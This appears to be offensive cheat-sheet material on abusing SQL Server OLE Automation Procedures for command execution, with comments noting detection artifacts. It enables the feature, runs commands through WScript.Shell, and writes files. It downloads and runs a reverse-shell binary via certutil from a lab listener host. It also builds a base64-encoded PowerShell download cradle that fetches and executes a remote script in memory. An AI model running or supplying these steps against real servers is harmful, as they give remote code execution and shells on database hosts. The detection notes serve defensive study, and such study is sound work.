
OLE-Automation-Procedures

Check

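-- Check whether OLE Automation Procedures are enabled on this instance.
-- `value` is the configured setting and `value_in_use` is the running one;
-- a mismatch means the option was changed but RECONFIGURE has not run yet.
-- The feature is off by default, so either column at 1 is a hardening
-- finding worth explaining.
SELECT
    name,
    value,
    value_in_use
FROM sys.configurations
WHERE name = 'Ole Automation Procedures';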

-- Enable. Both calls need the ALTER SETTINGS server permission (held
-- implicitly by sysadmin and serveradmin). 'ole automation procedures' is
-- an advanced option, so 'show advanced options' has to be on first.
-- sp_configure writes a "Configuration option ... changed" message to the
-- SQL Server error log for each change, which makes this easy to alert on.
EXECUTE sys.sp_configure 'show advanced options', 1;
RECONFIGURE;

EXECUTE sys.sp_configure 'ole automation procedures', 1;
RECONFIGURE;

Example

-- Minimal OLE execution proof: instantiate WScript.Shell from inside SQL
-- Server and call its Run method. sp_OACreate/sp_OAMethod require sysadmin
-- (or explicit EXECUTE on the procedures); with the default in-process
-- context the spawned cmd.exe runs as the SQL Server service account,
-- which is the reason the feature ships disabled.
DECLARE @objShell INT;
-- Receives sp_OACreate's integer return code (0 = success). It arrives here
-- only via implicit int->varchar conversion; INT would be the honest type.
DECLARE @output varchar(8000);

EXEC @output = sp_OACreate 'wscript.shell', @objShell Output;
-- The NULL return parameter discards Run's exit code, and no error text is
-- collected. For responders the observables are the SQL Server process
-- spawning cmd.exe and the output file written under C:\Windows\Tasks.
EXEC sp_OAMethod @objShell, 'run', NULL, 'cmd.exe /c "whoami > C:\Windows\Tasks\tmp.txt"';

File Write & Command Exec

-- Creates an (empty) text file through Scripting.FileSystemObject; the
-- trailing 1 is CreateTextFile's overwrite flag. The COM handle is never
-- released with sp_OADestroy, so it is torn down when the batch ends.
DECLARE @OLE INT;
EXEC sp_OACreate 'Scripting.FileSystemObject', @OLE OUT;
EXEC sp_OAMethod @OLE, 'CreateTextFile', NULL, 'C:\pwned.txt', 1;

-- Runs a command via WScript.Shell.Run with a hidden window (0) and waits
-- for it to finish (bWaitOnReturn), so @ret receives the exit code. The
-- redirect to C:\ole.txt is the on-disk artifact to look for afterwards.
DECLARE @sh INT, @ret INT;
EXEC sp_OACreate 'WScript.Shell', @sh OUT;
EXEC sp_OAMethod @sh, 'Run', @ret OUT, 'cmd.exe /c whoami > C:\ole.txt', 0, TRUE;

1. CMD.EXE + BINARY ON DISK

Create a directory, download the file, and execute it

-- Set 
-- Step 1 of 3: create the staging directory. Each of the three snippets
-- re-creates its own WScript.Shell handle because sp_OACreate objects are
-- destroyed at the end of the batch. Return codes are discarded (NULL).
DECLARE @objShell INT; DECLARE @output varchar(8000); EXEC @output = sp_OACreate 'wscript.shell', @objShell Output; EXEC sp_OAMethod @objShell, 'run', NULL, 'cmd.exe /c mkdir C:\tmp';

-- Stage
-- Step 2 of 3: fetch the binary with certutil (the URL is the lab listener
-- from this page). certutil -urlcache used as a downloader is one of the
-- most widely signatured LOLBin patterns; the SQL Server service account
-- launching it is a strong detection signal on its own.
DECLARE @objShell INT; DECLARE @output varchar(8000); EXEC @output = sp_OACreate 'wscript.shell', @objShell Output; EXEC sp_OAMethod @objShell, 'run', NULL, 'certutil -urlcache -f -split http://10.10.15.219:9999/rev.exe c:\tmp\rev.exe';

-- Execute
-- Step 3 of 3: run the dropped binary. Artifacts for responders: the file
-- under C:\tmp owned by the SQL Server service account, and a process
-- started from the SQL Server process (presumably sqlservr.exe as parent,
-- no cmd.exe in between since Run is given the exe directly).
DECLARE @objShell INT; DECLARE @output varchar(8000); EXEC @output = sp_OACreate 'wscript.shell', @objShell Output; EXEC sp_OAMethod @objShell, 'run', NULL, 'c:\tmp\rev.exe';

2. PowerShell Reverse Shell in Memory

  • Stage and serve shell.ps1

  • Create command file

# Write the PowerShell one-liner that the next two steps re-encode.
# -n keeps the trailing newline out of the text; >> appends to command.txt.
echo -n 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.15.219:9999/shell.ps1")' >> command.txt
  • PowerShell's `-e` (encoded command) expects UTF-16LE
# Re-encode the text as UTF-16LE, the encoding that powershell -e decodes.
iconv -f utf-8 -t utf-16le command.txt > conv.txt
  • Now Base64-encode it so no problematic characters remain
# Base64 on a single line (-w0); base64 reads the file directly, no cat needed.
base64 -w0 conv.txt
  • Pass the Base64 blob to powershell -e
-- Encoded PowerShell (-e) launched from the SQL Server process. Defensive
-- hooks: process command-line auditing records the -e blob, PowerShell
-- script block logging (event 4104) records the decoded content, and the
-- SQL Server process spawning powershell.exe is a high-fidelity alert.
DECLARE @objShell INT; DECLARE @output varchar(8000); EXEC @output = sp_OACreate 'wscript.shell', @objShell Output; EXEC sp_OAMethod @objShell, 'run', NULL, 'powershell -e SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKGh0dHA6Ly8xMC4xMC4xNS4yMTk6OTk5OS9zaGVsbC5wczEiKQ==';